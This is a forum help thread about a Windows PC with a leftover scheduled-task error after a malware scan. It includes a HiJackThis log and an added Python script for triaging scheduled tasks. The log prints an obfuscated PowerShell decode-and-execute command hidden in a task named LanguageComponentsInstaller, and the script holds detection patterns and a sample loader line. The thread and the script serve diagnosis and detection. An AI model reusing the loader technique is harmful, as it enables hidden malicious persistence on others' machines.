Computer stuttering after a Malwarebytes scan

WİRELESSMAN

After running a scan with Malwarebytes, I started getting this error:

"C:\ProgramData\Windows\Profile\1.vbs" komut dosyası bulunamıyor."

I have also started getting stutters of 1-2 seconds.
After the VBS error I also looked at the related thread and tried the solution, but I am still getting the error.
 
It looks to me like the payload of some malware that got in at some point has been deleted, but its scheduled task is still there. Unless you mistyped the path, there should be another folder named Microsoft before the Windows folder inside ProgramData. Please share the logs mentioned in this thread.


The stuttering may be caused by Malwarebytes' real-time protection feature.
 
If you type CMD into Start, run it as administrator and enter the sfc /scannow command, it will probably be fixed.
The stuttering problem is fixed, but the VBS error continues.

Code:
Logfile of HiJackThis Fork by Alex Dragokas v.2.9.0.26

Platform:  x64 Windows 10 (Home), 10.0.18363.1316 (ReleaseId: 1909), Service Pack: 0
Time:      01.02.2021 - 10:17 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: English (0x409)
Elevated:  Yes
Ran by:    Celal    (group: Administrator) on M4A1-COLT, FirstRun: yes

Chrome:  88.0.4324.104
Edge:    11.0.18362.1316
Internet Explorer: 11.0.18362.1
Default: "C:\Users\acer\AppData\Local\Programs\Opera\Launcher.exe" -noautoupdate -- "%1" (Opera Internet Browser)

Boot mode: Normal

Running processes:
Number | Path
   1  C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
   1  C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
   1  C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe
   1  C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
   1  C:\Program Files\AMD\CNext\CNext\AMDRSServ.exe
   1  C:\Program Files\AMD\CNext\CNext\RadeonSoftware.exe
   1  C:\Program Files\AMD\CNext\CNext\amdow.exe
   1  C:\Program Files\Acer\Quick Access Service\QALauncher.exe
   1  C:\Program Files\Acer\Quick Access Service\ePowerButton_NB.exe
   1  C:\Program Files\Riot Vanguard\vgtray.exe
   1  C:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe
   1  C:\Program Files\WindowsApps\28017CharlesMilette.TranslucentTB_9.0.0.0_x86__v826wp6bftszj\TranslucentTB\TranslucentTB.exe
   1  C:\Program Files\WindowsApps\Microsoft.MSPaint_6.2009.30067.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
   1  C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21011.101.0_x64__8wekyb3d8bbwe\YourPhone.exe
   1  C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21011.101.0_x64__8wekyb3d8bbwe\YourPhoneServer\YourPhoneServer.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
   1  C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
   1  C:\Users\acer\AppData\Local\Microsoft\OneDrive\OneDrive.exe
   1  C:\Users\acer\Desktop\HiJackThis.exe
   1  C:\Windows\ImmersiveControlPanel\SystemSettings.exe
   1  C:\Windows\System32\ApplicationFrameHost.exe
   1  C:\Windows\System32\CastSrv.exe
   1  C:\Windows\System32\DriverStore\FileRepository\u0359160.inf_amd64_2abe2598d9a3141f\B358802\atieclxx.exe
   1  C:\Windows\System32\DriverStore\FileRepository\u0359160.inf_amd64_2abe2598d9a3141f\B358802\atiesrxx.exe
   1  C:\Windows\System32\RtkAudUService64.exe
   9  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchIndexer.exe
   1  C:\Windows\System32\SecurityHealthService.exe
   1  C:\Windows\System32\SettingSyncHost.exe
   1  C:\Windows\System32\SgrmBroker.exe
   1  C:\Windows\System32\audiodg.exe
   1  C:\Windows\System32\backgroundTaskHost.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\oobe\UserOOBEBroker.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smartscreen.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\spoolsv.exe
   1  C:\Windows\System32\sppsvc.exe
  81  C:\Windows\System32\svchost.exe
   1  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\usocoreworker.exe
   1  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\explorer.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Default_Page_URL] = http://acer17win10.msn.com/?pc=ACTE
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O2 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\88.0.705.56\BHO\ie_to_edge_bho_64.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_271\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: IEToEdge BHO - {1FD49718-1D00-4B19-AF5F-070AF6D5D54C} - C:\Program Files (x86)\Microsoft\Edge\Application\88.0.705.56\BHO\ie_to_edge_bho.dll
O4 - HKCU\..\Run: [OneDrive] = C:\Users\acer\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (Microsoft)
O4 - HKCU\..\StartupApproved\Run: [Discord] = C:\Users\acer\AppData\Local\Discord\Update.exe --processStart Discord.exe (2020/10/22)
O4 - HKCU\..\StartupApproved\Run: [EpicGamesLauncher] = C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe -silent (2020/10/22)
O4 - HKCU\..\StartupApproved\Run: [GoogleDriveSync] = C:\Program Files\Google\Drive\googledrivesync.exe /autostart (2020/10/20)
O4 - HKCU\..\StartupApproved\Run: [Opera Browser Assistant] = C:\Users\acer\AppData\Local\Programs\Opera\assistant\browser_assistant.exe (2020/10/20)
O4 - HKCU\..\StartupApproved\Run: [Overwolf] = C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe -overwolfsilent (2021/01/17)
O4 - HKCU\..\StartupApproved\Run: [ProductAuthenticationService] = C:\Users\acer\AppData\Roaming\ProductAuthenticationService\pas.exe /nogui (2021/01/17)
O4 - HKCU\..\StartupApproved\Run: [SteamServerBrowser] = C:\Users\acer\AppData\Roaming\SteamServerBrowser\SteamServerBrowser.exe (2021/01/17)
O4 - HKCU\..\StartupApproved\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent (2020/10/22)
O4 - HKCU\..\StartupApproved\Run: [com.squirrel.WhatsApp.WhatsApp] = C:\Users\acer\AppData\Local\WhatsApp\Update.exe --processStart "WhatsApp.exe" (2020/10/26)
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [RtkAudUService] = C:\Windows\System32\RtkAudUService64.exe -background
O4 - HKLM\..\StartupApproved\Run32: [GrooveMonitor] = C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [LogMeIn Hamachi Ui] = C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe --auto-start (2020/11/23)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2020/09/21)
O4 - HKLM\..\StartupApproved\Run: [SecurityHealth] = (no file) (2020/10/27)
O15 - Trusted Zone: *.localhost
O17 - DHCP DNS 1: 192.168.1.1
O17 - HKLM\System\CCS\Services\Tcpip\..\{09f76097-5c82-4e33-8666-fbb75c0d0592}: [NameServer] = 1.0.1.1
O17 - HKLM\System\CCS\Services\Tcpip\..\{09f76097-5c82-4e33-8666-fbb75c0d0592}: [NameServer] = 1.1.1.1 (Well-known DNS: Cloudflare / APNIC)
O21 - HKLM\..\ShellIconOverlayIdentifiers\  GoogleDriveBlacklisted: Google Drive Shell extension - {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} - C:\Program Files\Google\Drive\googledrivesync64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\  GoogleDriveSynced: Google Drive Shell extension - {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} - C:\Program Files\Google\Drive\googledrivesync64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\  GoogleDriveSyncing: Google Drive Shell extension - {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} - C:\Program Files\Google\Drive\googledrivesync64.dll
O21-32 - HKLM\..\ShellExecuteHooks: [{B5A7F190-DDA6-4420-B3BA-52453494E6CD}] - Groove GFS Stub Execution Hook - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (disabled)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 1 (GFS Unread Stub): Groove Explorer Icon Overlay 1 (GFS Unread Stub) - {99FD978C-D287-4F50-827F-B2C658EDA8E7} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2 (GFS Stub): Groove Explorer Icon Overlay 2 (GFS Stub) - {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 2.5 (GFS Unread Folder): Groove Explorer Icon Overlay 2.5 (GFS Unread Folder) - {920E6DB1-9907-4370-B3A0-BAFC03D81399} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 3 (GFS Folder): Groove Explorer Icon Overlay 3 (GFS Folder) - {16F3DD56-1AF5-4347-846D-7C10C4192619} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O21-32 - HKLM\..\ShellIconOverlayIdentifiers\Groove Explorer Icon Overlay 4 (GFS Unread Mark): Groove Explorer Icon Overlay 4 (GFS Unread Mark) - {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\Windows\system32\MusNotification.exe /RunOnAC RebootDialog (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\Windows\system32\MusNotification.exe /RunOnBattery RebootDialog (Microsoft)
O22 - Task: (disabled) \S-1-5-21-1221631561-2260327829-492006883-1001\DataSenseLiveTileTask - C:\Windows\System32\DataUsageLiveTileTask.exe
O22 - Task: (update) \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker - C:\Windows\system32\MusNotification.exe (Microsoft)
O22 - Task: AMDInstallLauncher - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe /InstallAUEP
O22 - Task: AMDLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -AMDLinkUpdate
O22 - Task: AcerCMUpdateTask2.1.16258 - C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe /task
O22 - Task: BlueStacksHelper - C:\ProgramData\BlueStacks\Client\Helper\BlueStacksHelper.exe -sr
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: GoogleUpdateTaskMachineUA - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
O22 - Task: ModifyLinkUpdate - C:\Program Files\AMD\CIM\Bin64\InstallManagerApp.exe -UpdateCurrentUser
O22 - Task: Opera GX scheduled Autoupdate 1600277062 - C:\Users\acer\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled Autoupdate 1600103977 - C:\Users\acer\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0)
O22 - Task: Opera scheduled assistant Autoupdate 1600103979 - C:\Users\acer\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\acer\AppData\Local\Programs\Opera\assistant" $(Arg0)
O22 - Task: Overwolf Updater Task - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe /RunningFrom Schedule
O22 - Task: Power Button - C:\Program Files\Acer\Quick Access Service\ePowerButton_NB.exe -s
O22 - Task: Quick Access - C:\Program Files\Acer\Quick Access Service\QALauncher.exe
O22 - Task: Software Update Application - C:\ProgramData\OEM\UpgradeTool\ListCheck.exe
O22 - Task: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay
O22 - Task: StartCNBM - C:\Program Files\AMD\CNext\CNext\cncmd.exe benchmark
O22 - Task: StartDVR - C:\Program Files\AMD\CNext\CNext\RSServCmd.exe
O22 - Task: UEIPInvitation - C:\Program Files\Acer\User Experience Improvement Program Service\Framework\UEIPOOBECheck.exe
O22 - Task: UbtFrameworkService - C:\Program Files\Acer\User Experience Improvement Program Service\Framework\TriggerFramework.exe
O22 - Task: \Microsoft\Windows\LanguageComponentsInstaller\LanguageComponentsInstaller - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$ddd = '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';iex('$d=([regex]::Matches(''==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'',''.'',''RightToLeft'') | ForEach {$_.value}) -jo'+'in '''';$d=[Text.Encoding]::UTF'+2*2*2+'.GetString([Convert]::FromBase'+8*8+'String($d));$d|i'+'ex;')"
O22 - Task: \Oem\AcerJumpstartTask - C:\Program Files (x86)\Acer\Acer Jumpstart\hermes.exe /default
O23 - Service R2: AMD External Events Utility - C:\Windows\System32\DriverStore\FileRepository\u0359160.inf_amd64_2abe2598d9a3141f\B358802\atiesrxx.exe
O23 - Service R2: LMIGuardianSvc - C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe
O23 - Service R2: LogMeIn Hamachi Tunneling Engine - (Hamachi2Svc) - C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe -s
O23 - Service R2: QMEmulatorService - C:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe
O23 - Service R2: TeamViewer - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
O23 - Service S2: Google Güncelleme Hizmeti (gupdate) - (gupdate) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /svc
O23 - Service S2: Microsoft Office Click-to-Run Service - (ClickToRunSvc) - C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe /service (file missing)
O23 - Service S3: Google Chrome Elevation Service (GoogleChromeElevationService) - (GoogleChromeElevationService) - C:\Program Files\Google\Chrome\Application\88.0.4324.104\elevation_service.exe
O23 - Service S3: Google Güncelleme Hizmeti (gupdatem) - (gupdatem) - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /medsvc
O23 - Service S3: Malwarebytes Service - (MBAMService) - C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
O23 - Service S3: Office 64 Source Engine - (ose64) - c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
O23 - Service S3: Overwolf Updater Windows SCM - (OverwolfUpdater) - C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe /RunningFrom SCM
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - C:\Program Files\Rockstar Games\Launcher\RockstarService.exe
O23 - Service S3: Steam Client Service - C:\Program Files (x86)\Common Files\Steam\SteamService.exe /RunAsService
O23 - Service S3: Uncheater for BattleGroundsLite_SE - (uncheater_bgl) - C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe
O23 - Service S3: vgc - C:\Program Files\Riot Vanguard\vgc.exe


--
End of file - Time spent: 11,2 sec. - 34930 bytes, CRC32: FFFFFFFF. Sign: 챒챰
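
Added example, not part of the original thread or of HiJackThis: a small Python triage of the O22 (scheduled task) lines in a log like the one above. It flags tasks that launch a script host, including the quote-and-plus string splitting visible in the log's LanguageComponentsInstaller entry, and tasks whose target is gone, as the reply suggests for 1.vbs. The task names ExampleTask and \Example\Updater, the $x placeholder and the reason labels are made up for the example.

```python
import math
import re

# Layout seen in the log above: "O22 - Task: <name> - <command line>"
O22 = re.compile(r"^O22 - Task: (?P<name>.+?) - (?P<cmd>[A-Za-z]:\\.*)$")
# Leading backslash so AMD's cncmd.exe is not mistaken for cmd.exe.
SCRIPT_HOSTS = ("\\powershell.exe", "\\wscript.exe", "\\cscript.exe",
                "\\mshta.exe", "\\cmd.exe")
DECODE_EXEC = re.compile(r"\biex\b|invoke-expression|frombase64string")

def normalize(cmd):
    """Lower-case and undo quote-and-plus splitting (i'+'ex, 'Base'+8*8+'String')."""
    cmd = re.sub(r"'\+(\d+(?:\*\d+)*)\+'",
                 lambda m: str(math.prod(int(n) for n in m.group(1).split("*"))),
                 cmd.lower())
    return cmd.replace("'+'", "")

def triage(line):
    """Return (task name, [reasons]) for an O22 line, or None for other lines."""
    m = O22.match(line.strip())
    if not m:
        return None
    cmd, reasons = normalize(m["cmd"]), []
    if any(h in cmd for h in SCRIPT_HOSTS):
        reasons.append("script-host")
    if DECODE_EXEC.search(cmd):
        reasons.append("decode-and-execute")
    # Heuristic from the reply: the real tree is ProgramData\Microsoft\Windows.
    if "\\programdata\\windows\\" in cmd:
        reasons.append("lookalike-dir")
    # Assumption: tasks carry the same "(file missing)" note as the O23 line above.
    if cmd.endswith("(file missing)"):
        reasons.append("target-missing")
    return m["name"], reasons

# Constructed sample: lines 1, 2 and 5 are copied from the log, 3 and 4 are made up.
SAMPLE = r"""
O22 - Task: StartCN - C:\Program Files\AMD\CNext\CNext\cncmd.exe startwithdelay
O22 - Task: GoogleUpdateTaskMachineCore - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
O22 - Task: ExampleTask - C:\Windows\System32\wscript.exe "C:\ProgramData\Windows\Profile\1.vbs" (file missing)
O22 - Task: \Example\Updater - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$d=[Convert]::FromBase'+8*8+'String($x);$d|i'+'ex"
O23 - Service R2: TeamViewer - C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
"""

def flagged(log_text):
    """Map task name -> reasons for every O22 line with at least one reason."""
    hits = (triage(line) for line in log_text.splitlines())
    return {name: why for name, why in filter(None, hits) if why}
```

A flagged task is a lead to inspect in Task Scheduler, not a verdict; legitimate software also schedules PowerShell and script-host actions.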
 

There is a solved thread, but I don't know whether it will help.
 
